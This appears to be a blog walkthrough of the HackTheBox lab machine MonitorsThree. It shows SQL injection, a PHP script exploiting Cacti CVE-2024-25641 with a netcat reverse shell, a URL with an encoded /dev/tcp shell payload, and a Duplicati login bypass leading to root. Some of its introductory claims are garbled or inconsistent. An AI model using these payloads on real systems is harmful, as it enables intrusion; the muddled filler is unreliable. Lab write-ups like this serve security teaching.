Mastering MonitorsThree: Beginner's Guide from HackTheBox

Key Highlights

Explore the unique challenges and rewards of conquering MonitorsThree on HackTheBox.
Discover the essential tools and skills needed to navigate through the challenges and acquire the user flag.
Gain insights into what sets MonitorsThree apart on HackTheBox and how it stands out in terms of difficulty and complexity.
Learn about the significance of effective enumeration techniques for success in tackling MonitorsThree.
Understand whether beginners can successfully overcome the hurdles presented by MonitorsThree and emerge victorious in this Capture The Flag (CTF) environment.

Introduction

MonitorsThree on HackTheBox is a challenging machine that pushes your skills to the limit. As a beginner, mastering MonitorsThree can be both daunting and rewarding. This blog will guide you through the essential steps to conquer this machine, using techniques such as hacking and penetration testing. Get ready to dive into the world of CTF challenges and sharpen your hacking abilities. Let’s explore the intricacies of MonitorsThree and uncover the strategies to successfully hack it. Stay tuned for expert tips and tricks to grab that elusive user flag. Good luck on your hacking journey!

Understanding the Basics of MonitorsThree

MonitorsThree is a challenging platform on HackTheBox, requiring a deep understanding of NLP concepts. To conquer MonitorsThree, familiarity with pwn, rce, and CTF methodologies is essential. This blog guides users on navigating the intricacies of MonitorsThree, emphasizing the significance of honing application-specific skills. Mastery of these tools and techniques is crucial for successfully obtaining the user flag. Embrace the learning journey towards mastering MonitorsThree and excelling in the thrilling world of ethical hacking.

What Makes MonitorsThree Unique on HackTheBox?

MonitorsThree stands out on HackTheBox due to its intricate challenges and emphasis on advanced enumeration techniques. Its blend of cryptography, steganography, and reverse engineering makes it a favorite among seasoned hackers.

Essential Tools and Skills Needed

To tackle MonitorsThree on HackTheBox successfully, aspiring individuals must equip themselves with a range of essential tools and skills. Proficiency in exploiting vulnerabilities, understanding reverse engineering, and familiarity with privilege escalation techniques are paramount. Dexterity in using tools like IDA Pro, Ghidra, Burp Suite, and Metasploit significantly enhances one’s capability to conquer MonitorsThree. Mastering scripting languages such as Python and Bash proves invaluable for automating tasks and executing exploits efficiently. These competencies serve as the foundation for a successful endeavor in the realm of cybersecurity challenges.

NMap Scanning

I used Nmap to perform a thorough scan to search for open ports and services:

nmap -sC -sV -oN monitorsthreescan.txt 10.10.11.30

The scan detected two open ports: port 22, running OpenSSH 8.9p1 on Ubuntu Linux, and port 80, serving HTTP content via nginx 1.18.0, which was redirected to http://monitorsthree.htb. Additionally, port 8000 was found open with a SimpleHTTPServer 0.6, indicating a Python-based service. A range of ports were noted as filtered, including those for metagram, sco-sysmgr, spamassassin, and various others. The host appears to be a Linux system, with no other open or discernible services beyond those mentioned.

After visiting the website, we can see that it’s written in php:

admin is an endpoint, also admin/navbar.php. admin is also a username, confirmable by the password reset option.

Subdomain Enumeration

As HTTP was open, I enumerated subdomains with FFUF:

ALSO READ: Mastering Lantern: Beginner’s Guide from HackTheBox

Found a subdomain: http://cacti.monitorsthree.htb/cacti/. Added it to hosts file.

Also, found out the following

http://cacti.monitorsthree.htb/cacti/include/vendor/csrf/csrf-secret.php
http://cacti.monitorsthree.htb/cacti/cmd_realtime.php?1+1&&%3b0%3C%26196%3Bexec%20196%3C%3E%2Fdev%2Ftcp%2F10.10.11.30%2F1674%3B%20sh%20%3C%26196%20%3E%26196%202%3E%26196

SQL Injection on Domain

Next, I targeted the main subdomain and discovered an SQL Injection vulnerability in the forgot_password.php page. To streamline the exploitation process, I utilized SQLMap, which proved to be time-consuming due to the complexity of the vulnerability.

sqlmap -u "http://10.10.11.30/forgot_password.php" // use flag --level and --risk --batch

After a bit of digging around the output of SQLMap, I found out the creds of cacti and the main domain: admin:greencacti2001

Cacti RCE Vulnerability Exploitation

With the credentials obtained from SQLMap, I accessed the Cacti subdomain and identified a Remote Code Execution (RCE) vulnerability in Cacti during package import (CVE-2024-25641). (GitHub Advisory Link) Using the metasploit module : exploit/multi/http/cacti_package_import_rce, you’ll be able to land a shell as www-data

This got me shell: https://github.com/rapid7/metasploit-framework/pull/19196

<?php
$xmldata = "<xml>
   <files>
       <file>
           <name>root/rce.php</name>
           <data>%s</data>
           <filesignature>%s</filesignature>
       </file>
   </files>
   <publickey>%s</publickey>
   <signature></signature>
</xml>";
$filedata = "<?php shell_exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.14.27 4444 >/tmp/f'); ?>";
$keypair = openssl_pkey_new(); 
$public_key = openssl_pkey_get_details($keypair)["key"]; 
openssl_sign($filedata, $filesignature, $keypair, OPENSSL_ALGO_SHA256);
$data = sprintf($xmldata, base64_encode($filedata), base64_encode($filesignature), base64_encode($public_key));
openssl_sign($data, $signature, $keypair, OPENSSL_ALGO_SHA256);
file_put_contents("shutup.xml", str_replace("<signature></signature>", "<signature>".base64_encode($signature)."</signature>", $data));
system("cat shutup.xml | gzip -9 > shutup.xml.gz; rm shutup.xml");
?>

Now, save it as shell.php and run it using ‘php shell.php’. Upload the shell uploaded using nc. Exploit at

http://cacti.monitorsthree.htb/cacti/resource/shell.php

Digging around a bit, found ‘marcus’ has a user account in cacti.

User Flag

Port forwarding gets us the port 8200. There is a login page at http://127.0.0.1:8200/login.html
Once you gain access as the user Marcus, there is a port that can be accessed using the command: ssh -L 8200:127.0.0.1:8200 marcus@10.10.11.30 -i sessions/id_rsa_marcus

Marcus public key:

Password hashes, Marcus one got cracked

MariaDB [monitorsthree_db]> select * from users
    -> ;
+----+-----------+-----------------------------+----------------------------------+-------------------+-----------------------+------------+------------+-----------+
| id | username  | email                      | password                        | name              | position              | dob        | start_date | salary    |
+----+-----------+-----------------------------+----------------------------------+-------------------+-----------------------+------------+------------+-----------+
|  2 | admin    | admin@monitorsthree.htb    | 31a181c8372e3afc59dab863430610e8 | Marcus Higgins    | Super User            | 1978-04-25 | 2021-01-12 | 320800.00 |
|  5 | mwatson  | mwatson@monitorsthree.htb  | c585d01f2eb3e6e1073e92023088a3dd | Michael Watson    | Website Administrator | 1985-02-15 | 2021-05-10 |  75000.00 |
|  6 | janderson | janderson@monitorsthree.htb | 1e68b6eb86b45f6d92f8f292428f77ac | Jennifer Anderson | Network Engineer      | 1990-07-30 | 2021-06-20 |  68000.00 |
|  7 | dthompson | dthompson@monitorsthree.htb | 633b683cc128fe244b00f176c8a950f5 | David Thompson    | Database Manager      | 1982-11-23 | 2022-09-15 |  83000.00 |
+----+-----------+-----------------------------+----------------------------------+-------------------+-----------------------+------------+------------+-----------+

Marcus password: 12345678910

Bypassing Duplicati auth: https://medium.com/@STarXT/duplicati-bypassing-login-authentication-with-server-passphrase-024d6991e9ee

Private key of Marcus

For those having trouble bypassing Duplicati authentication:

In Burp, intercept the login request, forward it, and copy the session_nonce to the noncedpwd command.
Substitute the result as the password, forward the request, and then disable intercept.

To get a shell as root:

Generate SSH keys on your machine and copy the public key to a folder on the target box as authorized_keys.
In Duplicati, create a backup of this file and restore it to /root/.ssh/.
You should now be able to log in with the generated key as root.

ALSO READ: Building A CTF Challenge for a Workshop

Root Flag with privesc

Create a Tunnel: Establish a tunnel from the target machine (Casino) to your local machine using SSH:bashCopy codessh -i id_rsa marcus@10.10.11.30 -D 8300 Configure your browser to use port 8300 as a proxy. This will give access to a site running on 127.0.0.1:8200, which is Duplicati.

Extract the Duplicati Configuration File: On the target machine, navigate to /opt/duplicati/config and locate the Duplicati-server.sqlite file. Use scp to transfer the file to your machine and open it with SQLite Browser.

Retrieve the Passphrase: In the Option table, find the server-passphrase value. Convert this value from Base64 to Hex.

Sync Time with the Target Machine: Ensure your machine’s time matches the target machine’s time to avoid issues with the CSRF token:bashCopy codesudo timedatectl set-time xx:xx:xx

Bypass Authentication:
- Start Burp and set Intercept to capture requests.
- Attempt to log in to Duplicati with any password.
- Inspect the POST request, forward it once, and examine the response to locate the NONCE value.
- Copy the NONCE value in plain text (do not convert it).

Generate the Nonce Password:
- Open the developer console in your browser and execute the following JavaScript:javascriptCopy codevar noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse('value_of_NONCE') + 'value_of_hex_server_passphrase')).toString(CryptoJS.enc.Base64);
- Print noncepwd in the console and copy the resulting value.

Login with the Generated Nonce Password:
- In the next request in Burp, replace the password field with your noncepwd value.
- Highlight it, convert it to a URL, and press CTRL+U.
- Forward the request without intercepting further; you should now be logged in to Duplicati.

Create Backup and Extract Files:
- On the target machine (Casino), create two directories, e.g., dest and result, within Marcus’s folder.
- In Duplicati, create a new backup task with any name and description, and ensure no encryption is set.
- Set the destination folder to /source/home/marcus/dest and the target to /source/root/root.txt.
- After creating the task, refresh the Duplicati home page if needed to see the new backup task, then run it.
- Check /home/marcus/dest for .zip files on the Casino machine.

Restore the Backup:
- In Duplicati, select the backup to restore, and set the destination to /source/home/marcus/result.
- After the restore, check /home/marcus/result on the target machine, where you should find root.txt.

Conclusion

In conclusion, mastering MonitorsThree on HackTheBox requires honing your skills in hacking methodologies. With the right tools, such as exploit frameworks for remote code execution (RCE) and privilege escalation techniques, you can efficiently conquer challenges. Remember, the essence of Capture The Flag (CTF) events like HackTheBox lies in persistent learning and hands-on practice to enhance your prowess in the realm of application security. Stay curious, keep exploring, and never cease to grow in your journey as a cybersecurity enthusiast.

Frequently Asked Questions

How Do I Start with MonitorsThree on HackTheBox?

To start with MonitorsThree on HackTheBox, create an account on the platform, access the machine, and begin by enumerating services. Utilize tools like Nmap for scanning and enumeration to uncover vulnerabilities. Research and understand the specific challenges of MonitorsThree to progress effectively.

What Are Common Challenges in MonitorsThree?

MonitorsThree poses challenges such as intricate network configurations, advanced privilege escalation techniques, and complex cryptography puzzles. Overcoming these hurdles requires a deep understanding of cybersecurity concepts and the ability to think outside the box.

Can Beginners Successfully Conquer MonitorsThree?

Beginners can conquer MonitorsThree on HackTheBox with dedication and learning. By understanding the unique challenges it presents, acquiring essential tools and skills, success is within reach for those starting out in cybersecurity.

Tips for Effective Enumeration in MonitorsThree?

To effectively enumerate in MonitorsThree on HackTheBox, focus on thorough port scanning using tools like Nmap, enumerate services for vulnerabilities, and explore directories with DirBuster. Practice active enumeration techniques to uncover hidden paths and potential weaknesses.

2 thoughts on “Beginner’s Guide to Conquering MonitorsThree on HackTheBox”

Dylan

October 7, 2024 at 11:56 pm

I followed the instructions verbatim and it can’t find the php file no matter what I do.
- The CyberSec Guru
  
  October 13, 2024 at 8:30 am
  
  Will re-check. Thanks

Beginner’s Guide to Conquering MonitorsThree on HackTheBox

Key Highlights

Introduction

Understanding the Basics of MonitorsThree

What Makes MonitorsThree Unique on HackTheBox?

Essential Tools and Skills Needed

NMap Scanning

Subdomain Enumeration

SQL Injection on Domain

Cacti RCE Vulnerability Exploitation

User Flag

Root Flag with privesc

Conclusion

Frequently Asked Questions

How Do I Start with MonitorsThree on HackTheBox?

What Are Common Challenges in MonitorsThree?

Can Beginners Successfully Conquer MonitorsThree?

Tips for Effective Enumeration in MonitorsThree?

Join the Conversation

The analysis doesn't stop here. Connect with our community of tech enthusiasts and security pros for daily discussions and Q&As

Buy me A Coffee!

Support The CyberSec Guru’s Mission

Why your support matters:

If you like this post, then please share it:

Discover more from The CyberSec Guru

Related Posts

2 thoughts on “Beginner’s Guide to Conquering MonitorsThree on HackTheBox”

Leave a ReplyCancel reply

most recent

News

News

News

Glossary

CTF Walkthroughs

Glossary

Newsletter Subscription

Discover more from The CyberSec Guru